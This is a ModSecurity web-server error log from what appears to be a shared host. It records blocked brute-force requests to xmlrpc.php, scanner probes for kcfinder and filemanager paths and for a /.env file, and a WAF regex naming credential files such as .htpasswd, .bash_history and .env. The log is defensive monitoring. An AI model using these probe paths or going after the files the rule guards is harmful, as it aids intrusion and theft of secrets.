[Tue May 26 14:40:41.645969 2026] [security2:error] [pid 636820:tid 636953] [client 154.161.32.97:57052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVjka_r6oOphPch7B9zPgAAAAM"]
[Tue May 26 14:40:41.646088 2026] [security2:error] [pid 636820:tid 636953] [client 154.161.32.97:57052] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVjka_r6oOphPch7B9zPgAAAAM"]
[Tue May 26 14:40:42.055990 2026] [security2:error] [pid 636820:tid 636915] [remote 216.185.214.209:33898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVjka_r6oOphPch7B9zTQAANF4"]
[Tue May 26 14:40:42.481991 2026] [security2:error] [pid 636820:tid 637055] [client 108.136.162.67:61352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/resources/assets/admin/vendors/ckeditor/kcfinder/browse.php"] [unique_id "ahVjkq_r6oOphPch7B9zWgAAAGk"]
[Tue May 26 14:40:43.059747 2026] [security2:error] [pid 636820:tid 637041] [client 194.11.246.196:59811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.246.11.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/f35.php"] [unique_id "ahVjk6_r6oOphPch7B9zcAAAAFs"]
[Tue May 26 14:40:43.259153 2026] [security2:error] [pid 636820:tid 636965] [client 108.136.162.67:61463] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/admin/vendors/ckeditor/kcfinder/browse.php"] [unique_id "ahVjk6_r6oOphPch7B9zgQAAAA8"]
[Tue May 26 14:40:43.466178 2026] [security2:error] [pid 636820:tid 636974] [client 194.11.246.196:59988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.246.11.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/p.php"] [unique_id "ahVjk6_r6oOphPch7B9zjQAAABg"]
[Tue May 26 14:40:43.670837 2026] [security2:error] [pid 636820:tid 637017] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjk6_r6oOphPch7B9zgwAAAEM"]
[Tue May 26 14:40:43.824362 2026] [security2:error] [pid 636820:tid 636973] [client 194.11.246.196:60117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.246.11.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/adminfuns.php"] [unique_id "ahVjk6_r6oOphPch7B9zmAAAABc"]
[Tue May 26 14:40:44.038841 2026] [security2:error] [pid 636820:tid 637001] [client 108.136.162.67:61578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/kcfinder/browse.php"] [unique_id "ahVjlK_r6oOphPch7B9zpQAAADM"]
[Tue May 26 14:40:44.232430 2026] [security2:error] [pid 636820:tid 636960] [client 194.11.246.196:60267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.246.11.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/admin.php"] [unique_id "ahVjlK_r6oOphPch7B9zsAAAAAo"]
[Tue May 26 14:40:44.825722 2026] [security2:error] [pid 636820:tid 636970] [client 194.11.246.196:60406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.246.11.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/f35.php"] [unique_id "ahVjlK_r6oOphPch7B9zzQAAABQ"]
[Tue May 26 14:40:44.831119 2026] [security2:error] [pid 636820:tid 637018] [client 108.136.162.67:61709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/kcfinder/browse.php"] [unique_id "ahVjlK_r6oOphPch7B9zzgAAAEQ"]
[Tue May 26 14:40:45.261550 2026] [security2:error] [pid 636820:tid 636979] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjlK_r6oOphPch7B9zzAAAAB0"]
[Tue May 26 14:40:45.438221 2026] [security2:error] [pid 636820:tid 637027] [client 194.11.246.196:60618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.246.11.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/p.php"] [unique_id "ahVjla_r6oOphPch7B9z6QAAAE0"]
[Tue May 26 14:40:45.611456 2026] [security2:error] [pid 636820:tid 636955] [client 108.136.162.67:61823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/asset/plugins/kcfinder/browse.php"] [unique_id "ahVjla_r6oOphPch7B9z9AAAAAU"]
[Tue May 26 14:40:45.842753 2026] [security2:error] [pid 636820:tid 637062] [client 185.61.216.99:24955] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahVjla_r6oOphPch7B9z2QAAAHA"]
[Tue May 26 14:40:46.045370 2026] [security2:error] [pid 636820:tid 637018] [client 194.11.246.196:60880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.246.11.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/adminfuns.php"] [unique_id "ahVjlq_r6oOphPch7B90AgAAAEQ"]
[Tue May 26 14:40:46.051774 2026] [security2:error] [pid 636820:tid 637040] [client 202.141.83.254:19841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjlq_r6oOphPch7B90AwAAAFo"]
[Tue May 26 14:40:46.051890 2026] [security2:error] [pid 636820:tid 637040] [client 202.141.83.254:19841] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjlq_r6oOphPch7B90AwAAAFo"]
[Tue May 26 14:40:46.410097 2026] [security2:error] [pid 636820:tid 637066] [client 108.136.162.67:61916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/kcfinder/browse.php"] [unique_id "ahVjlq_r6oOphPch7B90DQAAAHQ"]
[Tue May 26 14:40:46.605225 2026] [security2:error] [pid 636820:tid 637005] [client 194.11.246.196:61097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.246.11.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/admin.php"] [unique_id "ahVjlq_r6oOphPch7B90DgAAADc"]
[Tue May 26 14:40:46.875026 2026] [security2:error] [pid 636820:tid 637048] [client 114.119.155.228:42911] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/wp-content/uploads/2017/11/Rock-Rose-Caithness.jpg"] [unique_id "ahVjlq_r6oOphPch7B90GwAAAGI"], referer: https://haddingtonwines.com/wp-content/uploads/2017/11/Rock-Rose-Caithness.jpg
[Tue May 26 14:40:47.223672 2026] [security2:error] [pid 636820:tid 636962] [client 108.136.162.67:62017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/kcfinder/browse.php"] [unique_id "ahVjl6_r6oOphPch7B90JQAAAAw"]
[Tue May 26 14:40:48.007042 2026] [security2:error] [pid 636820:tid 637018] [client 108.136.162.67:62119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/vendor/sunhater/kcfinder/browse.php"] [unique_id "ahVjmK_r6oOphPch7B90NgAAAEQ"]
[Tue May 26 14:40:48.137461 2026] [security2:error] [pid 636820:tid 637072] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjl6_r6oOphPch7B90MAAAAHo"]
[Tue May 26 14:40:48.799881 2026] [security2:error] [pid 636820:tid 636990] [client 108.136.162.67:62235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/public/assets/kcfinder/browse.php"] [unique_id "ahVjmK_r6oOphPch7B90VgAAACg"]
[Tue May 26 14:40:49.596763 2026] [security2:error] [pid 636820:tid 636971] [client 108.136.162.67:62355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/vendor/kcfinder/browse.php"] [unique_id "ahVjma_r6oOphPch7B90ZgAAABU"]
[Tue May 26 14:40:49.907060 2026] [security2:error] [pid 636820:tid 637001] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjma_r6oOphPch7B90YQAAADM"]
[Tue May 26 14:40:50.376415 2026] [security2:error] [pid 636820:tid 637047] [client 108.136.162.67:62457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/backend/assets/kcfinder/browse.php"] [unique_id "ahVjmq_r6oOphPch7B90fAAAAGE"]
[Tue May 26 14:40:51.176436 2026] [security2:error] [pid 636820:tid 637017] [client 108.136.162.67:62542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/resources/assets/kcfinder/browse.php"] [unique_id "ahVjm6_r6oOphPch7B90kAAAAEM"]
[Tue May 26 14:40:51.178105 2026] [security2:error] [pid 636820:tid 637060] [client 185.61.216.99:23385] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahVjmq_r6oOphPch7B90jAAAAG4"], referer: http://jhonparra.com/
[Tue May 26 14:40:52.187731 2026] [security2:error] [pid 636820:tid 636961] [client 108.136.162.67:62634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/administrator/components/kcfinder/browse.php"] [unique_id "ahVjm6_r6oOphPch7B90rQAAAAs"]
[Tue May 26 14:40:52.209371 2026] [security2:error] [pid 636820:tid 637032] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjm6_r6oOphPch7B90pAAAAFI"]
[Tue May 26 14:40:52.972212 2026] [security2:error] [pid 636820:tid 636985] [client 108.136.162.67:62757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/static/kcfinder/browse.php"] [unique_id "ahVjnK_r6oOphPch7B90ygAAACM"]
[Tue May 26 14:40:53.769095 2026] [security2:error] [pid 636820:tid 637048] [client 108.136.162.67:62841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/tinymce/js/tinymce/plugins/filemanager/dialog.php"] [unique_id "ahVjna_r6oOphPch7B905AAAAGI"]
[Tue May 26 14:40:54.090316 2026] [security2:error] [pid 636820:tid 637008] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjna_r6oOphPch7B904AAAADo"]
[Tue May 26 14:40:54.586361 2026] [security2:error] [pid 636820:tid 636979] [client 108.136.162.67:62925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/filemanager/dialog.php"] [unique_id "ahVjnq_r6oOphPch7B90_AAAAB0"]
[Tue May 26 14:40:55.450403 2026] [security2:error] [pid 636820:tid 637011] [client 108.136.162.67:63016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/filemanager/dialog.php"] [unique_id "ahVjn6_r6oOphPch7B91EQAAAD0"]
[Tue May 26 14:40:56.180517 2026] [security2:error] [pid 636820:tid 636999] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjn6_r6oOphPch7B91KAAAADE"]
[Tue May 26 14:40:56.248690 2026] [security2:error] [pid 636820:tid 637014] [client 108.136.162.67:63106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/portal/filemanager/dialog.php"] [unique_id "ahVjoK_r6oOphPch7B91OwAAAEA"]
[Tue May 26 14:40:56.617334 2026] [security2:error] [pid 636820:tid 636996] [client 202.141.83.254:54002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjoK_r6oOphPch7B91RAAAAC4"]
[Tue May 26 14:40:56.617471 2026] [security2:error] [pid 636820:tid 636996] [client 202.141.83.254:54002] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjoK_r6oOphPch7B91RAAAAC4"]
[Tue May 26 14:40:57.046206 2026] [security2:error] [pid 636820:tid 636974] [client 108.136.162.67:63207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin-portal/filemanager/dialog.php"] [unique_id "ahVjoa_r6oOphPch7B91VQAAABg"]
[Tue May 26 14:40:57.832333 2026] [security2:error] [pid 636820:tid 636967] [client 108.136.162.67:63317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/tinymce/filemanager/dialog.php"] [unique_id "ahVjoa_r6oOphPch7B91bQAAABE"]
[Tue May 26 14:40:58.179126 2026] [security2:error] [pid 636820:tid 637006] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjoa_r6oOphPch7B91aQAAADg"]
[Tue May 26 14:40:58.229162 2026] [security2:error] [pid 636820:tid 637018] [client 113.165.147.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjoa_r6oOphPch7B91bAAAAEQ"]
[Tue May 26 14:40:58.622570 2026] [security2:error] [pid 636820:tid 636951] [client 108.136.162.67:63413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/filemanager/dialog.php"] [unique_id "ahVjoq_r6oOphPch7B91hAAAAAE"]
[Tue May 26 14:40:58.866506 2026] [security2:error] [pid 636820:tid 636954] [client 165.140.119.146:54680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVjoq_r6oOphPch7B91iAAAAAQ"], referer: https://www.bloggertarget.com
[Tue May 26 14:40:58.866696 2026] [security2:error] [pid 636820:tid 636954] [client 165.140.119.146:54680] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVjoq_r6oOphPch7B91iAAAAAQ"], referer: https://www.bloggertarget.com
[Tue May 26 14:40:59.398462 2026] [security2:error] [pid 636820:tid 636956] [client 108.136.162.67:63507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/editor/plugins/filemanager/dialog.php"] [unique_id "ahVjo6_r6oOphPch7B91ngAAAAY"]
[Tue May 26 14:40:59.680085 2026] [security2:error] [pid 636820:tid 637020] [client 195.178.110.34:39688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/phpinfo.php"] [unique_id "ahVjo6_r6oOphPch7B91pwAAAEY"]
[Tue May 26 14:41:00.197709 2026] [security2:error] [pid 636820:tid 636982] [client 108.136.162.67:63637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/vendor/filemanager/dialog.php"] [unique_id "ahVjpK_r6oOphPch7B91ugAAACA"]
[Tue May 26 14:41:00.282239 2026] [security2:error] [pid 636820:tid 637047] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjo6_r6oOphPch7B91swAAAGE"]
[Tue May 26 14:41:00.986905 2026] [security2:error] [pid 636820:tid 637013] [client 108.136.162.67:63745] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/filemanager/dialog.php"] [unique_id "ahVjpK_r6oOphPch7B91zwAAAD8"]
[Tue May 26 14:41:01.781985 2026] [security2:error] [pid 636820:tid 637032] [client 108.136.162.67:63879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/tinymce/js/tinymce/plugins/filemanager/dialog.php"] [unique_id "ahVjpa_r6oOphPch7B916gAAAFI"]
[Tue May 26 14:41:02.284112 2026] [security2:error] [pid 636820:tid 637017] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjpa_r6oOphPch7B917gAAAEM"]
[Tue May 26 14:41:02.584696 2026] [security2:error] [pid 636820:tid 637002] [client 108.136.162.67:64015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/assets/filemanager/dialog.php"] [unique_id "ahVjpq_r6oOphPch7B92CgAAADQ"]
[Tue May 26 14:41:02.951187 2026] [security2:error] [pid 636820:tid 636958] [client 195.178.110.34:39696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/portal/.env"] [unique_id "ahVjpq_r6oOphPch7B92CwAAAAg"]
